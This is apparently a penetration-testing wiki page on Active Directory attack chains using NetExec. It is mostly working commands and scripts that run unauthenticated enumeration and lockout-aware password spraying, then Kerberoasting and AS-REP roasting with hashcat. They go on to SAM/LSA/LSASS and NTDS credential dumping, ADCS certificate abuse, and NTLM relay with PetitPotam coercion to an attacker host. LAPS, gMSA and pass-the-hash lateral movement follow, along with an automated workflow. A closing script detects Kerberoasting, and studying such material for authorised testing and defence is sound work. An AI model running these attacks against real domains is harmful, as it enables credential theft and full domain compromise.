Active Directory Attacks via NetExec
#Overview
NetExec (the maintained successor of CrackMapExec) can carry most of an AD attack chain, from unauthenticated enumeration to Domain Admin, with a single tool; only a few steps below (ADCS exploitation, RBCD ticket requests) hand off to certipy or impacket. This page documents end-to-end workflows that combine the SMB and LDAP protocols with NetExec's module ecosystem to replicate the most common AD attack paths.
#Attack Chain 1: Anonymous → Valid Credentials → Domain Admin
#Phase 1: Unauthenticated Enumeration
```bash
# Check for null session SMB access
netexec smb 10.10.10.0/24 -u '' -p '' --shares
# Any shares listed → null session possible
# Check SMB signing status (relay attack surface). Signing is part of the default
# banner, no module needed; --gen-relay-list writes the signing:False hosts to a file
netexec smb 10.10.10.0/24 -u '' -p '' --gen-relay-list relay_targets.txt
# signing:False → SMB relay candidate
# Check WebClient status (coercion + relay). The webdav module opens a named pipe on
# the target, so it normally needs a valid account rather than a null session
netexec smb 10.10.10.0/24 -u '' -p '' -M webdav
# WebClient service reported running → HTTP (WebDAV) coercion possible
# Anonymous LDAP enumeration
netexec ldap 10.10.10.5 -u '' -p '' --users
# If users returned → anonymous LDAP bind allowed
# AS-REP roasting without credentials: needs a username list; the DC answers
# AS-REQs for any listed account that does not require pre-authentication
netexec ldap 10.10.10.5 -u users.txt -p '' --asreproast asrep.txt
# If hashes returned → roastable accounts exist
```
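The signing flag is only one field of the SMB banner; the same line also carries the OS build, hostname, domain and whether SMBv1 is still accepted. The script below is an added example (not part of the original page or of NetExec) that turns saved banner output into a CSV inventory and derives the relay list and the SMBv1 host list from it. The `SAMPLE_BANNER` lines are constructed to match the `(name:…) (domain:…) (signing:…) (SMBv1:…)` layout NetExec prints; the IPs and hostnames are invented.

```bash
#!/usr/bin/env bash
# Parse NetExec SMB banner lines into a host inventory and derived target lists.
# SAMPLE_BANNER is constructed sample output, not a capture from a real network.
SAMPLE_BANNER='SMB         10.10.10.5      445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.10.20     445    FS01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.10.10.21     445    WS01             [*] Windows 10 / Server 2016 Build 14393 x64 (name:WS01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         10.10.10.30     445    LEGACY           [*] Windows 6.1 Build 7601 x64 (name:LEGACY) (domain:corp.local) (signing:False) (SMBv1:True)'

# banner_to_csv: stdin = netexec smb output, stdout = ip,name,domain,signing,smbv1
# Lines without a signing field (errors, module output) are dropped.
banner_to_csv() {
    grep -E '\(signing:(True|False)\)' |
    sed -E 's/^SMB +([0-9.]+) +[0-9]+ +[^ ]+ +.*\(name:([^)]*)\) \(domain:([^)]*)\) \(signing:([^)]*)\) \(SMBv1:([^)]*)\).*$/\1,\2,\3,\4,\5/'
}

# relay_targets: CSV on stdin -> IPs that do not require SMB signing, one per line
relay_targets() {
    awk -F, '$4 == "False" { print $1 }'
}

# smbv1_hosts: CSV on stdin -> IPs still accepting SMBv1 (legacy systems worth a closer look)
smbv1_hosts() {
    awk -F, '$5 == "True" { print $1 }'
}

# Stand-alone use:  netexec smb 10.10.10.0/24 -u '' -p '' | tee smb_banner.txt
#                   ./inventory.sh smb_banner.txt
if [ "$#" -ge 1 ]; then
    banner_to_csv < "$1" > inventory.csv
    relay_targets < inventory.csv > relay_targets.txt
    smbv1_hosts   < inventory.csv > smbv1_hosts.txt
    echo "hosts: $(awk 'END { print NR }' inventory.csv), relay targets: $(awk 'END { print NR }' relay_targets.txt)"
fi
```

The CSV is the artifact to keep: it feeds the relay list for Chain 2, tells you which builds are old enough to matter for other techniques, and is what ends up in the report.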
#Phase 2: Obtain Initial Credentials
```bash
# Crack AS-REP hashes (etype 23, the $krb5asrep$23$ format NetExec writes)
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
# If no roastable accounts, spray common passwords: one password per pass over the
# user list, staying below the lockout threshold (read it first with --pass-pol)
netexec smb 10.10.10.0/24 -u users.txt -p 'Password1' --continue-on-success
netexec smb 10.10.10.0/24 -u users.txt -p 'CompanyName2024!' --continue-on-success
```
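Spraying is the step in this chain that can take the whole user base offline, so the round size should come from the lockout policy rather than from habit. The script below is an added example, not part of the page or of NetExec: it reads the threshold and reset window from `--pass-pol` output, sizes each round two attempts below the threshold, and sleeps out the reset window between rounds. `SAMPLE_POLICY` is constructed and assumes the `Key: value` layout of `--pass-pol` output; the function names are my own.

```bash
#!/usr/bin/env bash
# Lockout-aware spray wrapper around netexec. SAMPLE_POLICY is constructed sample
# output used only to exercise the parser; real runs read the DC's policy.
SAMPLE_POLICY='SMB  10.10.10.5  445  DC01  [+] Dumping password info for domain: CORP
SMB  10.10.10.5  445  DC01  Minimum password length: 7
SMB  10.10.10.5  445  DC01  Password history length: 24
SMB  10.10.10.5  445  DC01  Account Lockout Threshold: 5
SMB  10.10.10.5  445  DC01  Reset Account Lockout Counter: 30 minutes
SMB  10.10.10.5  445  DC01  Locked Account Duration: 30 minutes'

# policy_value KEY  (stdin = --pass-pol output) -> first integer following "KEY:"
policy_value() {
    sed -nE "s/.*$1: *([0-9]+).*/\1/p" | head -n 1
}

# spray_budget THRESHOLD -> attempts allowed per observation window.
# Keeps two attempts in reserve for the users' own typos; a threshold of 0 means
# no lockout, which is still capped so the spray stays quiet.
spray_budget() {
    t=$1
    if [ "$t" -eq 0 ]; then echo 10
    elif [ "$t" -le 2 ]; then echo 1
    else echo $((t - 2)); fi
}

# spray_rounds DC TARGETS USERS_FILE PASSWORDS_FILE
# One password per round across the user list; after each budget of rounds,
# sleep one minute past the reset window so the bad-password count is back to zero.
# The policy is read over a null session; substitute valid creds if the DC refuses.
spray_rounds() {
    dc=$1; targets=$2; users=$3; passwords=$4
    pol=$(netexec smb "$dc" -u '' -p '' --pass-pol)
    threshold=$(printf '%s\n' "$pol" | policy_value 'Account Lockout Threshold')
    window=$(printf '%s\n' "$pol" | policy_value 'Reset Account Lockout Counter')
    if [ -z "$threshold" ] || [ -z "$window" ]; then
        echo "could not parse the lockout policy, refusing to spray" >&2
        return 1
    fi
    budget=$(spray_budget "$threshold")
    echo "[*] threshold=$threshold window=${window}m -> $budget password(s) per window"
    n=0
    while IFS= read -r pw; do
        netexec smb "$targets" -u "$users" -p "$pw" --continue-on-success | grep -F '[+]'
        n=$((n + 1))
        if [ $((n % budget)) -eq 0 ]; then sleep $(( (window + 1) * 60 )); fi
    done < "$passwords"
}

# Stand-alone use: ./spray.sh 10.10.10.5 10.10.10.0/24 users.txt passwords.txt
if [ "$#" -ge 4 ]; then spray_rounds "$@"; fi
```

A fine-grained password policy (PSO) can set a stricter threshold for specific groups than the domain default shows; check with the `pso` module before trusting the domain-wide number.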
#Phase 3: Enumerate with Valid Credentials
```bash
# Full LDAP enumeration
netexec ldap 10.10.10.5 -u valid_user -p valid_pass --users
netexec ldap 10.10.10.5 -u valid_user -p valid_pass --groups
netexec ldap 10.10.10.5 -u valid_user -p valid_pass --trusted-for-delegation
netexec ldap 10.10.10.5 -u valid_user -p valid_pass -M adcs
netexec ldap 10.10.10.5 -u valid_user -p valid_pass -M laps
netexec ldap 10.10.10.5 -u valid_user -p valid_pass --gmsa
# BloodHound collection (a built-in flag, not a module; point DNS at the DC so
# hostnames resolve during collection)
netexec ldap 10.10.10.5 -u valid_user -p valid_pass --bloodhound -c All --dns-server 10.10.10.5
# SMB session enumeration (find where admins are logged on)
netexec smb 10.10.10.0/24 -u valid_user -p valid_pass --sessions
netexec smb 10.10.10.0/24 -u valid_user -p valid_pass --loggedon-users
```
#Phase 4: Credential Theft
```bash
# Kerberoasting
netexec ldap 10.10.10.5 -u valid_user -p valid_pass --kerberoasting kerberoast.txt
# -m 13100 is the RC4 (etype 23) format; AES tickets ($krb5tgs$17$ / $krb5tgs$18$)
# need -m 19600 / 19700 and crack far more slowly
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt
# AS-REP roasting (with credentials the DC's own user list is queried, so it finds more targets)
netexec ldap 10.10.10.5 -u valid_user -p valid_pass --asreproast asrep2.txt
hashcat -m 18200 asrep2.txt /usr/share/wordlists/rockyou.txt
# Validate cracked credentials
netexec smb 10.10.10.0/24 -u cracked_user -p cracked_pass --continue-on-success
```
#Phase 5: Privilege Escalation
```bash
# If cracked user has local admin on any host → dump SAM/LSA
netexec smb 10.10.10.5 -u cracked_admin -p cracked_pass --sam
netexec smb 10.10.10.5 -u cracked_admin -p cracked_pass --lsa
netexec smb 10.10.10.5 -u cracked_admin -p cracked_pass -M lsassy
# Check for ADCS escalation path
# (NetExec's adcs module only lists enrollment services and templates; exploitation needs certipy-ad)
certipy find -dc-ip 10.10.10.5 -u valid_user@domain.local -p valid_pass -vulnerable
# If ESC1 found (use the template name certipy reports; CA_HOST is the CA server):
certipy req -dc-ip 10.10.10.5 -u valid_user@domain.local -p valid_pass -ca 'CA-Name' -target CA_HOST -template ESC1 -upn administrator@domain.local
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.5
# LAPS: the module prints every LAPS password the account has read rights on
netexec ldap 10.10.10.5 -u valid_user -p valid_pass -M laps
# Password returned → local admin on that computer
# gMSA: --gmsa prints the NT hash of every gMSA password the account can read
netexec ldap 10.10.10.5 -u valid_user -p valid_pass --gmsa
# Hash returned → service account compromise
```
#Phase 6: Domain Dominance
```bash
# If Domain Admin achieved → dump NTDS (DRSUAPI replication by default, i.e. a DCSync;
# --ntds vss takes a shadow copy and copies the file instead)
netexec smb 10.10.10.5 -u domain_admin -p pass --ntds
# Validate Domain Admin across all DCs (look for Pwn3d! on each)
netexec smb dc_list.txt -u domain_admin -p pass
# Dump SAM/LSA on all hosts
netexec smb targets.txt -u domain_admin -p pass --sam --continue-on-success
netexec smb targets.txt -u domain_admin -p pass --lsa --continue-on-success
```
#Attack Chain 2: NTLM Relay to Domain Admin
```bash
# Step 1: The relay target in this chain is LDAP on the DC, so what matters is LDAP
# signing and channel binding on the DC, not SMB signing on the workstations
netexec ldap 10.10.10.5 -u user -p pass -M ldap-checker
# (for SMB-to-SMB relays, collect the signing:False hosts with --gen-relay-list instead)
# Step 2: Find hosts with WebClient running (coercion targets; HTTP auth relays to LDAP)
netexec smb 10.10.10.0/24 -u user -p pass -M webdav
# Step 3: Set up relay (separate terminal)
sudo impacket-ntlmrelayx -t ldap://DC_IP --delegate-access -smb2support
# Step 4: Coerce the WebClient host to authenticate over HTTP to the attacker.
# The listener is given as HOST@80/path so the victim uses WebDAV, and HOST must be a
# name that resolves to you (ADIDNS record or LLMNR/NBT-NS spoofing). Unauthenticated
# coercion was patched in 2021, so valid domain credentials are normally required.
python3 PetitPotam.py -u user -p pass 'ATTACKER_HOST@80/x' WEBDAV_HOST_IP
# Step 5: ntlmrelayx creates a new machine account and writes RBCD
# (msDS-AllowedToActOnBehalfOfOtherIdentity) on the coerced host's computer object,
# not on the DC: the relayed identity is that host's machine account
# Step 6: Impersonate administrator to the coerced host via S4U2Self/S4U2Proxy
impacket-getST -spn cifs/WEBDAV_HOST.domain.local -impersonate administrator domain.local/MACHINE_ACCOUNT$:PASS
export KRB5CCNAME=administrator.ccache   # use the ccache file name getST prints
impacket-secretsdump -k -no-pass WEBDAV_HOST.domain.local
# This gives local admin on the coerced host; reach DA from there (cached creds,
# logged-on admins) or by coercing a DC and relaying to a different DC
```
#Attack Chain 3: Kerberoasting → Full Compromise
```bash
# Step 1: Enumerate SPNs and request service tickets
netexec ldap 10.10.10.5 -u user -p pass --kerberoasting kerberoast.txt
# Step 2: Crack offline (RC4 hashes; AES ones need -m 19600 / 19700)
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt -O
# Target high-value SPNs first: sql_svc, svc_backup, *_admin
# Step 3: Validate cracked credential
netexec smb 10.10.10.0/24 -u cracked_svc -p cracked_pass --continue-on-success
# Check for (Pwn3d!) — local admin indicator
# Step 4: If service account has local admin somewhere → dump
netexec smb 10.10.10.5 -u cracked_svc -p cracked_pass --sam
netexec smb 10.10.10.5 -u cracked_svc -p cracked_pass --lsa
# Step 5: Check if service account is Domain Admin (--groups with a group name lists its members)
netexec ldap 10.10.10.5 -u cracked_svc -p cracked_pass --groups 'Domain Admins'
# Step 6: If Domain Admin → NTDS dump
netexec smb 10.10.10.5 -u cracked_svc -p cracked_pass --ntds
```
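Both roasting steps above (Phase 4 and Chain 3) feed everything to `-m 13100`, but NetExec writes whatever encryption type the ticket came back with, and an AES ticket silently fails to load in an RC4 mode. The script below is an added example, not part of the page or of NetExec: it splits a roast file by etype, reports the hashcat mode for each bucket, and tags the account names that match the high-value patterns the text mentions. `SAMPLE_HASHES` are constructed, truncated strings in the hashcat layouts (`$krb5tgs$23$*user$REALM$spn*$…` for RC4, `$krb5tgs$17|18$user$REALM$*spn*$…` for AES); they contain no real ticket material.

```bash
#!/usr/bin/env bash
# Route NetExec roasting output to the right hashcat mode and rank the accounts.
# SAMPLE_HASHES is constructed sample data (truncated, not real tickets).
SAMPLE_HASHES='$krb5tgs$23$*sql_svc$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*$1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d$aabbccddeeff00112233445566778899
$krb5tgs$18$svc_backup$CORP.LOCAL$*backup/bk01.corp.local*$0011223344556677889900aa$ffeeddccbbaa99887766554433221100
$krb5tgs$23$*helpdesk$CORP.LOCAL$HTTP/portal.corp.local*$9f8e7d6c5b4a39281706f5e4d3c2b1a0$00ff00ff00ff00ff00ff00ff00ff00ff
$krb5tgs$17$app_admin$CORP.LOCAL$*HTTP/app01.corp.local*$deadbeefcafef00d$0123456789abcdef0123456789abcdef
$krb5asrep$23$jdoe@CORP.LOCAL:0123456789abcdef0123456789abcdef$fedcba9876543210fedcba9876543210'

# hashcat_mode ETYPE -> TGS-REP hashcat mode for that Kerberos encryption type
hashcat_mode() {
    case "$1" in
        23) echo 13100 ;;   # RC4-HMAC
        17) echo 19600 ;;   # AES128-CTS-HMAC-SHA1-96
        18) echo 19700 ;;   # AES256-CTS-HMAC-SHA1-96
        *)  return 1 ;;
    esac
}

# roast_etype LINE -> etype of a $krb5tgs$ line, non-zero status for anything else
roast_etype() {
    case "$1" in
        '$krb5tgs$'*) printf '%s\n' "$1" | cut -d'$' -f3 ;;
        *) return 1 ;;
    esac
}

# roast_user LINE -> account name; the RC4 layout wraps "user$REALM$spn" in asterisks,
# the AES layout puts the asterisks around the SPN only, so the user is field 4 in both
roast_user() {
    case "$1" in
        '$krb5tgs$23$'*)    printf '%s\n' "$1" | cut -d'$' -f4 | tr -d '*' ;;
        '$krb5tgs$1'[78]'$'*) printf '%s\n' "$1" | cut -d'$' -f4 ;;
        *) return 1 ;;
    esac
}

# split_roast HASHFILE OUTDIR -> writes OUTDIR/tgs_etype<N>.txt per type and prints
# "etype mode count" for each bucket; AS-REP and junk lines are skipped
split_roast() {
    in=$1; out=$2; mkdir -p "$out"
    while IFS= read -r line; do
        et=$(roast_etype "$line") || continue
        printf '%s\n' "$line" >> "$out/tgs_etype$et.txt"
    done < "$in"
    for f in "$out"/tgs_etype*.txt; do
        et=${f##*etype}; et=${et%.txt}
        printf '%s %s %s\n' "$et" "$(hashcat_mode "$et")" "$(wc -l < "$f" | tr -d ' ')"
    done
}

# high_value HASHFILE -> account names tagged high/low by the name patterns in the text
high_value() {
    while IFS= read -r line; do roast_user "$line" || true; done < "$1" |
    awk 'tolower($0) ~ /sql|backup|admin|svc/ { print "high " $0; next } { print "low " $0 }' | sort -k1,1
}

# Stand-alone use: ./split_roast.sh kerberoast.txt roast_out
if [ "$#" -ge 2 ]; then
    split_roast "$1" "$2"
    high_value "$1"
fi
```

Run the RC4 bucket first with the full wordlist and rules; spend AES budget only on the accounts the ranking marks as high value, since each AES guess costs thousands of times more than an RC4 one.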
#Attack Chain 4: LAPS → Lateral Spread
```bash
# Step 1: Find LAPS-managed computers; the module prints the password for every
# computer the current user is allowed to read (only a computer list → no read rights)
netexec ldap 10.10.10.5 -u user -p pass -M laps
# Step 2: Use each LAPS password to access its computer. The managed account is local,
# so --local-auth is required; it may be a renamed admin rather than "administrator"
netexec smb COMPUTER1 -u administrator -p LAPS_PASS1 --local-auth --sam
netexec smb COMPUTER2 -u administrator -p LAPS_PASS2 --local-auth --sam
# Step 3: Check for credential overlap in the SAM dumps. LAPS keeps its own account
# unique per host, but other local admins and hosts outside LAPS coverage often share a
# hash → pass-the-hash across the range
netexec smb 10.10.10.0/24 -u administrator -H ':COMMON_HASH' --continue-on-success --local-auth
```
#Attack Chain 5: gMSA → Service Account → Domain Escalation
```bash
# Step 1: Enumerate gMSA accounts and dump the NT hash of every password the user can read
netexec ldap 10.10.10.5 -u user -p pass --gmsa
# The password itself is 256 random bytes, rotated every 30 days by default, so the
# usable artifact is its NT hash; after a rotation it has to be read again
# Step 2: Authenticate as the gMSA with the hash: pass-the-hash directly in NetExec (-H),
# or request a Kerberos TGT with impacket
impacket-getTGT domain.local/GMSA_ACCOUNT$ -hashes :NTHASH
# Step 3: Check service account privileges
netexec ldap 10.10.10.5 -u 'GMSA_ACCOUNT$' -H ':NTHASH' --groups
# Some gMSA accounts have elevated group memberships
```
#Automated Multi-Stage Workflow
Combine everything into a scripted workflow:
```bash
#!/bin/bash
# Full AD assessment using NetExec
set -u
TARGETS="10.10.10.0/24"
DC="10.10.10.5"
# Do not reuse $USER: the shell already sets it to the local login name
DOM_USER="${1:?usage: $0 <domain_user> <password>}"
DOM_PASS="${2:?usage: $0 <domain_user> <password>}"

echo "[*] Phase 1: SMB signing and WebClient survey"
netexec smb "$TARGETS" -u '' -p '' --gen-relay-list relay_targets.txt
netexec smb "$TARGETS" -u "$DOM_USER" -p "$DOM_PASS" -M webdav
echo "[*] Phase 2: LDAP enumeration"
netexec ldap "$DC" -u "$DOM_USER" -p "$DOM_PASS" --users
netexec ldap "$DC" -u "$DOM_USER" -p "$DOM_PASS" --groups
netexec ldap "$DC" -u "$DOM_USER" -p "$DOM_PASS" --trusted-for-delegation
netexec ldap "$DC" -u "$DOM_USER" -p "$DOM_PASS" -M adcs
netexec ldap "$DC" -u "$DOM_USER" -p "$DOM_PASS" -M laps
netexec ldap "$DC" -u "$DOM_USER" -p "$DOM_PASS" --gmsa
netexec ldap "$DC" -u "$DOM_USER" -p "$DOM_PASS" -M maq            # machine account quota (RBCD relay needs > 0)
netexec ldap "$DC" -u "$DOM_USER" -p "$DOM_PASS" -M ldap-checker   # LDAP signing / channel binding
echo "[*] Phase 3: Kerberoasting and AS-REP roasting"
netexec ldap "$DC" -u "$DOM_USER" -p "$DOM_PASS" --kerberoasting kerberoast.txt
netexec ldap "$DC" -u "$DOM_USER" -p "$DOM_PASS" --asreproast asrep.txt
echo "[*] Phase 4: Session and logged-on enumeration"
netexec smb "$TARGETS" -u "$DOM_USER" -p "$DOM_PASS" --sessions
netexec smb "$TARGETS" -u "$DOM_USER" -p "$DOM_PASS" --loggedon-users
echo "[*] Phase 5: BloodHound collection"
netexec ldap "$DC" -u "$DOM_USER" -p "$DOM_PASS" --bloodhound -c All --dns-server "$DC"
echo "[*] Done. Review output and proceed to exploitation phase."
```
#Common Pitfalls
- ⚠️ Don't skip enumeration: The most common AD attack failure is insufficient enumeration. You can't attack what you don't know exists.
- ⚠️ Kerberoasting without a cracking plan: Roasting 50 SPNs is pointless if you can't crack them. Target high-value SPNs with weak password patterns, and send AES hashes to their own hashcat modes instead of assuming everything is RC4.
- ⚠️ Ignoring LAPS/gMSA: These are often overlooked attack paths. A single LAPS-readable password = local admin on that computer, and read rights usually cover many computers.
- ⚠️ Relay without a signing check: NTLM relay to an SMB host with signing:True, or to LDAP with signing and channel binding enforced, will fail. Run --gen-relay-list (SMB) or the ldap-checker module (LDAP) first.
- ⚠️ BloodHound without analysis: Collecting BloodHound data is step 1. Analyzing it for attack paths is step 2. Don't skip the analysis.
#OPSEC Considerations
| Phase | Noise Level | Notes |
|---|---|---|
| Unauthenticated enum | Low | Null sessions, banner/signing checks; one SMB connection per host |
| Authenticated enum | Low–Medium | LDAP queries look like normal client traffic; --sessions and --loggedon-users create a network logon (4624) on every host touched |
| Kerberoasting | Medium | One 4769 per roasted SPN; a single account requesting RC4 (etype 0x17) tickets for many services in seconds is the classic detection |
| Credential dumping | High | --sam/--lsa work through the remote registry service; lsassy reads LSASS memory on the host |
| NTDS dump | Very High | --ntds uses DRSUAPI replication by default (a DCSync, logged as 4662 with the replication GUIDs); --ntds vss creates a shadow copy and pulls the file over SMB |
| Relay attacks | Medium | Incoming NTLM auth from coerced hosts; --delegate-access creates a computer object (4741) and writes msDS-AllowedToActOnBehalfOfOtherIdentity on the victim (5136 if directory auditing is on) |
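The Kerberoasting row is worth turning into a concrete check, both to know what a defender sees and to test a client's detection. The script below is an added example (not part of the page or of NetExec): it runs over an export of 4769 events and flags any user account that requested RC4 service tickets for several distinct services. `SAMPLE_4769` is a constructed CSV whose column layout (time, requesting account, service name, ticket encryption type, client IP) is my own simplification of the event's fields, not a real log export.

```bash
#!/usr/bin/env bash
# Kerberoast detection over exported 4769 events. SAMPLE_4769 is constructed data.
SAMPLE_4769='time,account,service,etype,client_ip
2024-05-01T09:00:01,jdoe,MSSQLSvc/sql01.corp.local:1433,0x17,10.10.10.50
2024-05-01T09:00:01,jdoe,HTTP/portal.corp.local,0x17,10.10.10.50
2024-05-01T09:00:02,jdoe,backup/bk01.corp.local,0x17,10.10.10.50
2024-05-01T09:00:02,jdoe,HTTP/app01.corp.local,0x17,10.10.10.50
2024-05-01T09:00:02,jdoe,ldap/dc01.corp.local,0x17,10.10.10.50
2024-05-01T09:00:03,jdoe,ldap/dc01.corp.local,0x17,10.10.10.50
2024-05-01T09:05:10,asmith,cifs/fs01.corp.local,0x12,10.10.10.61
2024-05-01T09:05:11,asmith,HTTP/portal.corp.local,0x12,10.10.10.61
2024-05-01T09:06:00,ws01$,ldap/dc01.corp.local,0x12,10.10.10.21
2024-05-01T09:07:00,ws01$,MSSQLSvc/sql01.corp.local:1433,0x17,10.10.10.21'

# roast_alerts MIN  (stdin = 4769 CSV) -> "account distinct_rc4_services client_ip"
# for every user account with at least MIN distinct services requested with RC4.
# Machine accounts (trailing $) are skipped: they legitimately use RC4 for old hosts,
# and Kerberoasting is done with a user account. Repeated requests for the same
# service count once, so a chatty but normal client does not trip the threshold.
roast_alerts() {
    awk -F, -v min="$1" '
        NR > 1 && $4 == "0x17" && $2 !~ /\$$/ {
            key = $2 SUBSEP $3
            if (!(key in seen)) { seen[key] = 1; n[$2]++; ip[$2] = $5 }
        }
        END { for (a in n) if (n[a] >= min) printf "%s %d %s\n", a, n[a], ip[a] }'
}

# Stand-alone use: ./roast_alerts.sh events_4769.csv 4
if [ "$#" -ge 2 ]; then roast_alerts "$2" < "$1"; fi
```

The threshold is the tuning knob: a low number catches NetExec's default behaviour (it requests every SPN in one pass), a higher one tolerates service accounts that legitimately talk to many RC4-only services. In an AES-only environment the same logic keyed on etype 0x12 is far noisier, which is exactly why a tester should record which types the roast returned.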
#Post-Exploitation Value
Each attack chain culminates in one or more of:
- Domain Admin → full domain control
- NTDS.dit → every domain credential
- Enterprise Admin → forest-wide control (other forests only through trust abuse, if trusts exist)
- LAPS passwords → local admin on specific computers
- gMSA passwords → service account compromise
- BloodHound graph → documented attack paths for reporting
#Cross-References
- SMB Operations — SMB enumeration and dumping
- LDAP Operations — LDAP enumeration and roasting
- Password Spraying — Initial credential acquisition
- Credential Dumping — Hash extraction techniques
- AD Attacks (General) — Full AD attack technique library
- Lateral Movement — Spreading after initial compromise